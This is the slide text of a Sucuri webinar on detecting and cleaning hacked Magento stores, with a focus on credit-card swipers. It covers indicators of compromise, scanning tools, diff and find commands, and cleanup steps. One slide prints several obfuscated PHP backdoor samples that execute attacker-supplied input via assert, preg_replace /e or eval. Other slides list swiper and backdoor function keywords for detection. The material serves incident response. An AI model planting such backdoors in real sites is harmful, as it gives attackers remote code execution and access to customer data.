Sucuri Webinar: How to Clean a Hacked Magento Website

How to CLEAN a Hacked Magento SiteWEBINAR

Cesar Anjos | @sucurisecurity #AskSucuri

WEBINAR




WEBINAR




VALENTIN VESABrand Evangelist - Moderator@adspedia



HOUSEKEEPING ITEMS

● We want to hear from you

● Question tab in GoToWebinar

● Tweet @SucuriSecurity using #AskSucuri

● Questions will be answered at the end

● All questions will receive a response

● Video and slides coming in a few days

● Please share this content with other website owners



WEBINAR


CESAR ANJOSSecurity Analyst / Incident Responder at Sucuri



WEBINAR


Porto, Portugal



WEBINAR


What to expect from this webinar

● Understanding if there may have been some compromise

● How to assess if there may be any credit card stealers on the site

● How to look for the most common types of credit card stealers

● How to get rid of most infections without actually having much

technical knowledge



WEBINAR


sucuri.net/guides

Step-by-step walkthroughs

for popular CMS platforms

and website security issues.

Get Instructions



WEBINAR


Data stealer malware

● Biggest enemy of Magento

installations.

● Confirmation of a breach may

require cooperation with authorities.

● Advisable to alert customers as they

may have not (yet) been affected

by it.



WEBINAR


Overview

● Looking for signs of compromise

● Finding the malware

● Clean the infection and wipe its remains

● What Now?



WEBINAR


Understanding Data breach implications

If any compromise happens, be sure to make a full backup of:

•Server log files

•All files pertaining the site

•Database

Having a data breach on your website affects the website, its owner, and its users.

The website owner has the responsibility to investigate any suspicion of compromise and keep record of all

findings.

Any data stolen by the attackers is usually used within the first 12hrs (post-theft). In some cases, it may also

be kept for later use, or sold.



WEBINAR


LOOKING FOR SIGNS OF COMPROMISEWhat are some of the indicators that your website has been compromised?



WEBINAR


Indicators of compromise:

● Customers reporting strange behavior on your site

● Checkout process acting oddly

● Customers complaining that their data was stolen after buying on your website

● External scanners detecting some malware or blacklist

● Unauthorized acesses or changes

● You just spot something strange, such as a defacement



WEBINAR


Dialog with customers

● Data being stolen

● Redirects

● Pop-ups

● Alert messages

● When exactly did the visit and theft occur

● What browser/Antivirus/OS/platform

● Were any purchases done on other websites

● Detailed explanation of what happened

What they report What you need to verify



WEBINAR


Abnormal checkout behavior

● Redirects

● Pop-ups

● Strange files being loaded on the page

● Payments going to someone else’s account

● Just doesn’t work

Ensuring that the entire flow keeps its integrity is very important.



WEBINAR




WEBINAR


Using a Virtual Credit Card

● Virtual Credit cards have spending limit and usually very short expiration date

● Most banks across the world offer such service

● Low risk if stolen

● Can use pre-paid or debit system

● No direct relation between the card and your Identity

● May have a per card cost, usually 1$.



WEBINAR


Scan your site

● Sucuri Sitecheck - sitecheck.sucuri.net

● Hypernode’s Magereport - magereport.com

● Magescan - magescan.com

● Google’s Virustotal - virustotal.com



WEBINAR


Sitecheck

● Checks for blacklists

● Scans for multiple kinds of malware within the site

● Provides immediate insight on what was detected



WEBINAR


Magereport

● Checks for missing patches

or vulnerable elements

● Check for certain specific

malware types that affect

Magento environments



WEBINAR


Virustotal

Checks for blacklists on multiple providers



WEBINAR


Blacklist

Google’s blacklist is the most damaging blacklist.

Blacklisted websites lose about 95%

of traffic



WEBINAR


Modus Operandi of credit card swipers

● Typically Javascript

● Can work based on current page e.g.

“firecheckout”

● Can be present on PHP files that directly

handle checkouts

● Gets cached easily by Magento

● Typically stored inside /media

● Usually disguises itself as an image or a

file with no extension

● File size grows over 3Mb’s extremely fast

● Can only be inside PHP files

Sends the data to an external domain Stores the Data on your domain’s files



WEBINAR


FINDING THE MALWAREHow can the malware be located?



WEBINAR


Focused analysis

● Needle in a haystack

● Start by focusing on what you already know

● Attempting to establish a timeframe is important in data theft cases

● Look for what else may be present



WEBINAR


Check modified files

● Using Diff command to compare with a clean version

● Checking for files modified within the last few days if you suspect the

compromise was recent

● Try Amasty’s Free Modified Core files reporting tool

https://blog.amasty.com/freebie-magento-modified-core-files-report-by-amasty

https://blog.amasty.com/freebie-magento-modified-core-files-report-by-amasty/



WEBINAR


Diff command

● $ mkdir magento-2.1.3

● $ cd magento-2.1.3

● $ wgetgithub.com/magento/magento2/archive/2.1.3.tar.gz

● $ tar -zxvf 2.1.3.tar.gz

● $ diff -r 2.1.3 ./public_html

● Has to be run through SSH.

● Useful to get a direct comparison of what is different

between 2 sets of folders.

● If comparison is done with a freshly downloaded

installation any modules that have been installed by

the owner have to be compared separately.

● Can also be used to compare current live version with a backup to get a direct result of what is different.



WEBINAR


Files modified recently

● $ find ./ -type f -mtime -15Tells what files were modified in the last 15 days

● $ find ./ -type f -mtime -30Tells what files were modified in the last 30 days

● This gives a clear indication of what files have been

modified in the timeframe specified.

● If you have a clear date of when the compromise

might have happened, this is a great starting point.



WEBINAR


Pro Tip - Check your modified files

● Look for files bigger than 3Mb’s as they may store customers stolen data

$find . -type f -size +3M

● Use Sucuri’s Backup service as an Integrity Records keeper



WEBINAR


Audit users list

● Any unfamiliar users must be removed



WEBINAR


Functions/code most used by malware that steals credit card info/logins

Search for common swiper functions/code

● <script (with inclusion of an external file)

● http.open

● http.send

● this[“eval”]

● fwrite

● file_put_contents

● FILE_APPEND

● mail(

● Curl



WEBINAR


Example swipers on app/code/core/Mage/Checkout/controllers/OnepageController.php



WEBINAR


Search for common backdoor functions/code

● assert

● stripslashes

● preg_replace (with /e/)

● move_uploaded_file

● strrev

● file_get_contents

● encodeURI

● strtr

● base64

● str_rot13

● gzuncompress

● gzinflate

● curl_exec

● exec

● create_function

● wget

● system



WEBINAR


Common backdoors

<?php if/*pzC*/(isset($_REQUEST['gTOM']))/*A*/{/*h*/$1=/*B*/"assert";$G=$1/*HJ*/(/*jyM*/$_REQUEST\['gTOM'])/*tC*/;exit;}?>

<?php /*k*/if(!function_exists('_BmHCiKnI')){$GLOBALS['_CbuEzptH_']=Array('' .'preg_repla' .'ce'); @function

_BmHCiKnI($i){$a=Array('jQzN','/(.*)/e','jQzN','');return $a[$i];}if(@isset($_REQUEST[_BmHCiKnI(0)])){

@$GLOBALS['_CbuEzptH_'][0](_BmHCiKnI(1),$_REQUEST[_BmHCiKnI(2)],_BmHCiKnI(3));exit;}}

<?php if(isset($_COOKIE["lI"])){$_COOKIE["ud"]($_COOKIE["lI"]);exit;}

<?php function echo2($token){ @eval($token);}echo2($_POST[libsodium]);?>

if(md5($_COOKIE['key']) == $key) { eval (base64_decode($_POST["code"])); }

${"QK"}=@$ {"_POST"/*cdtxd6*/};@((($QK{ "0"}/*vgx94*/<>@$QK{"1"})))?@ $QK{"2" }(( (/*nkp*/@${"QK"}{"3"}))):${'QK'



WEBINAR


Check your site’s header and footer areas

Footer and header areas are a prime target for attackers because they load

throughout the site



WEBINAR




WEBINAR




WEBINAR


Check with an outside expert

Consult directly with security experts when in doubt, or just require assistance.



WEBINAR


CLEAN THE INFECTION AND WIPE ITS REMAINSHow to effectively get rid of Magento’s most common infections



WEBINAR


Before you attempt to fix anything

● Ensure that you have performed a full backup of files and database

● Store them in a safe location

● Preferably import your website on a temporary environment

● Place your website in maintenance mode, if required

● Contact authorities if you are a big store and there was any data theft



WEBINAR


Fix hacked files

● Search the files for any malware indication you may have obtained

● Inspect the modified files that were discovered by the investigation

● Restore those files to a known integral legitimate state from official sources

● Googling parts of suspicious code may help with cleanup

● Remove any suspicious code

● Test the site to ensure everything still works as it should



WEBINAR


Suspicious code

● Sometimes code may look suspicious because it is encoded,

but many modules have the code encoded to prevent being

stolen.

● The modules must be individually compared with their

original version.

● Some online tools that help decode remaining code.● ddecode.com/phpdecoder

● unphp.net/

● jsbeautifier.org/



WEBINAR


Using ddecode.com



WEBINAR


Using unphp.com



WEBINAR


Database infections

● Ensure that you have a full backup before any operation.

● They can usually be cleaned directly through the backend of

the site

● Attackers usually infect the core_config_data table, more

specifically, the records design/head/includes and design/footer/absolute_footer



WEBINAR


Tidying up

● Reset user passwords

● Change cPanel or FTP/SFTP credentials

● Review who has access to what

● Clear caches (very important step)

● Fix any malware warnings or blacklists



WEBINAR


All CLEAN, WHAT NOW?



WEBINAR


Steps to take

● Ensure all security patches are applied

● Have a backup system in place

● Scan computers that access the backend

● Add extra control/protection mechanisms to the site

● Take every precaution to ensure that all vulnerable areas are secure or

patched, such as /downloader

● Change backend admin area URL

● Make regular purchases on your own site to ensure its integrity (using virtual Credit Cards)



WEBINAR


Useful extensions/services to have in place

● Sucuri Firewall

● MageFirewall Security

● Nexcess Sentry Two-Factor Authentication

● miniOrange Two-Factor Authentication

● Admin Actions Log extension (if there are various admin users)



WEBINAR


You have to assume the attackers will be back

● Keep all accesses filtered and monitored

● Keep up with security updates

● Prepare an incident response plan with your team -https://github.com/talesh/response

● Ensure that the backup system works when needed; test by restoring

it on a separate location and verify that it works

https://github.com/talesh/response



WEBINAR


Website Firewall



WEBINAR


Tweet us any time with your questions @SucuriSecurity using #AskSucuri

THANK YOUTime for Questions

Internet

Sucuri Webinar: How to Clean a Hacked Magento Website